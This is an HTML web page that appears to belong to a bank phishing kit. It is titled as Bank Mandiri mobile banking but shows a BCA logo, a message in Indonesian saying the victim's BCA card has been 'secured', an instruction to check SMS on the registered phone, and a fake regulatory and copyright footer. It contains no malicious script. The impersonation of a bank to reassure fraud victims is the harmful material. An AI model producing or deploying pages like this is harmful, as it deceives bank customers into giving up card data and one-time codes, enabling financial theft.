<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Bank Mandiri - Mobile Banking</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/tailwindcss/2.2.19/tailwind.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/daisyui@4.12.10/dist/full.min.css" rel="stylesheet" type="text/css" />
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/alpinejs/3.10.2/cdn.min.js" defer></script>
</head>

<body>
    <style>
        footer {
            padding: 30px 0;
            min-height: 180px;
        }
        .modal-login .btn:hover,
        .modal-login .btn:focus {
            background: #023ff2 !important;
        }
    </style>
    
    <!-- Header -->
    <div class="text-center">
        <nav class="navbar navbar-light navbar-expand navbar-fixed-top" style="background: #1583ff; box-shadow: 0 2px 13px 0 rgb(0 0 0 / 25%);">
            <div class="container-fluid" style="display: flex; justify-content: flex-start;">
                <a class="navbar-brand" href="#" style="display: flex; align-items: center;">
                    <img src="../images/bca-logo.png" width="34%">
                </a>
            </div>
        </nav>
    </div>

    <!-- Main Content -->
    <div class="container mt-4">
        <div class="card" style="border-radius: 9px; border: 2px solid rgb(219,221,224);">
            <div class="card-body">
                <div class="text-center">
                    <!-- Tambah margin-top untuk memindahkan gambar ke bawah -->
                    <img class="img-fluid" src="https://i.ibb.co.com/BNfJ56X/IMG-20241014-WA0000.jpg" style="margin: 50px 0 14px 0;">
                    <h6 style="font-family: calibri; font-size: 18px; font-weight: bold; margin-bottom: 22px;">
                        <span style="color: red;">Terima kasih Kartu BCA berhasil diamankan</span>
                    </h6>
                    <p style="font-family: calibri; font-size: 14px; font-weight: bold; margin-bottom: 22px;">
                        <span style="color: rgb(0, 0, 0);">Silahkan cek sms no telepon anda yang terdaftar di Bank BCA</span>
                    </p>
                </div>
            </div>
        </div>
    </div>
    

    <!-- Footer -->
    <footer style="margin-top: 35px; background: url('../images/footer.jpg') top / cover no-repeat;">
        <div class="col" style="width: 100%; text-align: center; margin: 20px 0;">
            <img src="../assets/img/ayii.png" style="width: 62%; margin-top: 10px; margin-bottom: 5px;">
            <p style="text-align: center; font-family: calibri; font-size: 12px; color: rgb(255,255,255); margin-bottom: 5px;">
                Bank BCA Indonesia terdaftar dan diawasi oleh Otoritas Jasa Keuangan (OJK) serta merupakan peserta penjamin Lembaga Penjamin Simpanan LPS
            </p>
            <p style="text-align: center; font-family: calibri; font-size: 12px; color: rgb(255,255,255); margin-top: 0px; margin-bottom: -1px;">
                Copyright © 2024 Bank BCA Indonesia
            </p>
        </div>
    </footer>

    <script src="../assets/bootstrap/js/bootstrap.min.js"></script>
</body>

</html>